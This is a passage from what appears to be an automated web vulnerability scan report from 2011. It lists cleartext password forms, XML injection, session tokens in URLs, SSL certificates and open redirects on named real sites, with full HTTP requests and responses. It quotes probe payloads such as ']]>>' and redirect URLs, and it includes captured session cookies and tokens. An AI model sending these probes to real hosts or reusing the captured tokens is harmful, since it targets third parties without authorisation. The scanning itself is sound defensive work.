Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:56 GMT
Content-Length: 20681

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts are
...[SNIP]...
</script>
<form name="form2" method="post" action="Calendar.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...

6.8. http://www.livewithoscar.com/Chat.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /Chat.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /Chat.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/DailyOmni.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.8.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:02:42 GMT
Content-Length: 20808

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts are
...[SNIP]...
</script>
<form name="form2" method="post" action="Chat.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...

6.9. http://www.livewithoscar.com/DailyOmni.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /DailyOmni.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /DailyOmni.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/optout.aspx?u=1211&token=479e20863458d05ef0fb482e950827b9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.2.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:23 GMT
Content-Length: 44997

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts ar
...[SNIP]...
</script>
<form name="form2" method="post" action="DailyOmni.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...

6.10. http://www.livewithoscar.com/FlashIframe.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /FlashIframe.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /FlashIframe.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/optout.aspx?u=1211&token=479e20863458d05ef0fb482e950827b9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.1.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:07 GMT
Content-Length: 13776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta id="RefreshPer
...[SNIP]...
</script>
<form name="form2" method="post" action="FlashIframe.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...

7. XML injection
There are 4 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


7.1. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/follow_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/follow_button.html?screen_name=WSJ&show_count=false&show_screen_name=true HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 295
Date: Tue, 14 Jun 2011 00:14:01 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/follow_button.html</Key><RequestId>7A323588EB26C97F</Requ
...[SNIP]...

7.2. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/follow_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/follow_button.html]]>>?screen_name=WSJ&show_count=false&show_screen_name=true HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 295
Date: Tue, 14 Jun 2011 00:14:04 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/follow_button.html]]&gt;&gt;</Key><RequestId>3B85B8189F04A81E</Requ
...[SNIP]...

7.3. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /e]]>>/getdata.xgi?dt=br&pkey=kdii33k3nlxia&ru=http%3A%2F%2Fpix04.revsci.net%2FD08734%2Fa1%2F0%2F3%2F0.js%3FD%3DDM_LOC%253Dhttp%25253A%25252F%25252Fna.com%25253Fnada%25253D%3Cna_da%3E%252526naid%25253D%3Cna_id%3E%252526namp%25253D%3Cna_mp%3E HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Tue, 14 Jun 2011 00:14:15 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7.4. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /e/getdata.xgi]]>>?dt=br&pkey=kdii33k3nlxia&ru=http%3A%2F%2Fpix04.revsci.net%2FD08734%2Fa1%2F0%2F3%2F0.js%3FD%3DDM_LOC%253Dhttp%25253A%25252F%25252Fna.com%25253Fnada%25253D%3Cna_da%3E%252526naid%25253D%3Cna_id%3E%252526namp%25253D%3Cna_mp%3E HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Tue, 14 Jun 2011 00:14:16 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8. Session token in URL
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


8.1. http://pixel.alexametrics.com/atrk.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://pixel.alexametrics.com
Path:   /atrk.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /atrk.gif?random_number=13442793427&jsv=20090615&user_cookie=8a1417a21308b8c7cc21f56479b&user_cookie_flag=1&sess_cookie=8a1417a21308b8c7cc21f56479b&sess_cookie_flag=1&host_url=http%3A%2F%2Fwww.alexa.com%2F&ref_url=&cookie_enabled=1&java_enabled=1&screen_params=1920x1200x32&flashver=10.3.181&time=1308011297988&time_zone_offset=300&title=Alexa%20the%20Web%20Information%20Company&domain=alexa.com&label=home&account=s3LE913x9k00WW HTTP/1.1
Host: pixel.alexametrics.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: lmHgGpu5SwPHhUUBdI1jpDyd/Ui6DI/aW6ImgDlWJVtPnCrayfTKY/P7gzpq86od
x-amz-request-id: EE6A63A80097A9E8
Date: Fri, 13 May 2011 12:53:46 GMT
x-amz-meta-alexa-last-modified: 20110117123941
Last-Modified: Mon, 17 Jan 2011 20:41:40 GMT
ETag: "221d8352905f2c38b3cb2bd191d630b0"
Accept-Ranges: bytes
Content-Type: image/gif
Content-Length: 43
Server: AmazonS3
Age: 70459
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 564a64f1818853969657bce8dfc50ec6c5ec134108ef42980a20660d202595fa1c91c37f35e03ab6
Via: 1.0 c662f4e5a3bc7b224ce1bbecb0a23d82.cloudfront.net:11180 (CloudFront), 1.0 f633d3d099dda5545ae196d0f3869b62.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

GIF89a.............!.......,...........D..;

8.2. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&app_id=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26ad6e48%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df282e93c28%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6e479cc%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df103fe2ee%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df664004d4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.100.34
X-Cnection: close
Date: Tue, 14 Jun 2011 00:13:56 GMT
Content-Length: 238

<script type="text/javascript">
parent.postMessage("cb=f103fe2ee&origin=http\u00253A\u00252F\u00252Fonline.wsj.com\u00252Ff2bfe1068&relation=parent&transport=postmessage&frame=f37019a21c", "http:\/\/o
...[SNIP]...

9. SSL certificate
There are 6 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



9.1. https://login.yahoo.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  login.yahoo.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Dec 20 18:00:00 CST 2010
Valid to:  Thu Jan 03 17:59:59 CST 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Jan 13 13:20:32 CST 2010
Valid to:  Wed Sep 30 13:19:47 CDT 2015

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

9.2. https://buy.wsj.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.wsj.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  buy.wsj.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Wed Oct 06 19:00:00 CDT 2010
Valid to:  Sun Oct 09 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

9.3. https://edit.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  edit.yahoo.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Wed May 19 03:54:49 CDT 2010
Valid to:  Wed Jun 19 17:41:46 CDT 2013

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

9.4. https://en.wordpress.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://en.wordpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.wordpress.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Oct 14 06:29:26 CDT 2010
Valid to:  Wed Oct 14 06:29:26 CDT 2015

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

9.5. https://login21.marketingsolutions.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login21.marketingsolutions.yahoo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.marketingsolutions.yahoo.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Wed Aug 23 12:36:40 CDT 2006
Valid to:  Tue Aug 23 12:36:40 CDT 2011

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

9.6. https://marketingsolutions.login.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://marketingsolutions.login.yahoo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  marketingsolutions.login.yahoo.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Fri Feb 01 17:41:33 CST 2008
Valid to:  Thu Jan 31 17:41:33 CST 2013

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

10. Open redirection
There are 2 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


10.1. http://b.scorecardresearch.com/r [d.c parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//a54e375280e0c6b5c/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

Request

GET /r?c2=6035148&d.c=http%3a//a54e375280e0c6b5c/a%3fgif&d.o=djglobal&d.x=252794533&d.t=page&d.u=http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Fnews-tech-technology.html%3Frefresh%3Don HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a54e375280e0c6b5c/a?gif
Date: Tue, 14 Jun 2011 00:13:57 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 13-Jun-2013 00:13:57 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.2. http://r.nexac.com/e/getdata.xgi [ru parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Issue detail

The value of the ru request parameter is used to perform an HTTP redirect. The payload http%3a//a7f01869e5f0330bd/a%3fhttp%3a//pix04.revsci.net/D08734/a1/0/3/0.js%3fD%3dDM_LOC%253Dhttp%25253A%25252F%25252Fna.com%25253Fnada%25253D<na_da>%252526naid%25253D<na_id>%252526namp%25253D<na_mp> was submitted in the ru parameter. This caused a redirection to the following URL:

Request

GET /e/getdata.xgi?dt=br&pkey=kdii33k3nlxia&ru=http%3a//a7f01869e5f0330bd/a%3fhttp%3a//pix04.revsci.net/D08734/a1/0/3/0.js%3fD%3dDM_LOC%253Dhttp%25253A%25252F%25252Fna.com%25253Fnada%25253D<na_da>%252526naid%25253D<na_id>%252526namp%25253D<na_mp> HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
X-Powered-By: Jigawatts
